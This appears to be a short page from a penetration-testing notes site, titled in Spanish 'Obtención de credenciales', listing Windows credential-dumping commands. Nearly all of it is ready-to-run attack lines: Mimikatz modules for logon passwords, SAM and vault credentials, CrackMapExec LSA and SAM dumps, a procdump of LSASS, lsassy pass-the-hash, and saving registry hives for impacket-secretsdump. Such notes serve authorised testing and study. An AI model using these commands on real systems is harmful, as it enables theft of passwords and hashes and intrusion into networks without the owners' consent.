3. Obtención de credenciales
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
Mimikatz
mimikatz.exe
Invoke-Mimikatz.ps1
SharpKatz.exe
pypykatz.exeMimiKatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' CrackMapExec
crackmapexec smb <IP> -u <USER> -p <PASS> --lsaprocdump
1- Get-Process -Name LSASS
2- .\\procdump.exe -ma <ProcNum> lsass.dmplsassy
lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --usersSecretDump
1- reg save HKLM\\sam sam
2- reg save HKLM\\system system
3- reg save HKLM\\security security
4- impacket-secretsdump -sam sam -security security -system system LOCALMimiKatz
Invoke-Mimikatz -Command '"lsadump::sam"' CrackMapExec
crackmapexec smb <IP> -u <USER> -p <PASS> --samMimiKatz
Invoke-Mimikatz -Command '"vault::cred /patch"'